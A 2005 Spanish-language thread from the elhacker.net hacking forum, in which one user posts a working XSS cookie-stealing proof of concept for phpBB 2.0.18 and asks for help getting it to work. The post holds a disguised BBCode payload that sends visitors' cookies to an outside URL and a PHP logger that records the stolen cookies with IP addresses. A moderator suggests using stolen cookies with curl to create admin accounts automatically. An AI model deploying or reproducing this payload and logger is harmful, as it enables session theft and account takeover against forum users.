elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:30  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [OB] phpBB 2.0.18 XSS + PHP Cookie Stealer		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [OB] phpBB 2.0.18 XSS + PHP Cookie Stealer  (Leído 2,264 veces)
ZyrroX

Desconectado Desconectado

Mensajes: 38


Ver Perfil
[OB] phpBB 2.0.18 XSS + PHP Cookie Stealer
« en: 24 Diciembre 2005, 02:31 »
A ver si alguien consigue hacer algo con esto....


Código:
******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
        -- `HTML must be enabled on the forums
-- 'the html is on exploit'

original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
-- http://securityreason.com/securityalert/269/
proof of concept by: jet
-- http://jet.carbon-4.net/

develop a pure, lucid mind, not
depending upon sound, flavor,
touch, odor, or any quality.
- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:epresionje(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>
« Última modificación: 31 Diciembre 2005, 04:52 por Sirdarckcat » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpBB 2.0.18 XSS Cookie Disclosure Proof of Concept
« Respuesta #1 en: 24 Diciembre 2005, 03:02 »
Eso seria culpa del admin que dejo hacer eso.. normalemente los tags se cierran sin permitir ningun valor despues del <b, por ejemplo <b c=">" se deberia cerrar en <b>.. en fin

Saludos
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: phpBB 2.0.18 XSS Cookie Disclosure Proof of Concept
« Respuesta #2 en: 24 Diciembre 2005, 11:25 »
Otra mas para los phpbb  ;D
¿esto sería un ataque XSS, no?, porque roba la cookie del admin
Saludos  ::)
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: phpBB 2.0.18 XSS Cookie Disclosure Proof of Concept
« Respuesta #3 en: 30 Diciembre 2005, 02:47 »
rey11 roba todas las cookies, no solo admin, y el PoC que publicó, como que no es muy util a mi opinion, porquesi el admin cierra la sesión ya no funciona.
creo que lo mejor seria en lugar de guardar la cookie en un log, inmediatamente mediante curl, crearse una cuenta de admin.

luego publico como hacerlo :P, creo que ayudaria a entender un poco los ataques a nviel web, porque muchos ven a XSS, sin gran peligrosidad, y no se dan cuenta de que es muy peligroso.

Saludos!!
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
ZyrroX

Desconectado Desconectado

Mensajes: 38


Ver Perfil
Re: phpBB 2.0.18 XSS Cookie Disclosure Proof of Concept
« Respuesta #4 en: 30 Diciembre 2005, 12:26 »
Mil gracias Sirdarckcat porq intente varias veces conseguir la cookie pero nada... a ver si con tu ayuda sale algo.
Gracias  ;)
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines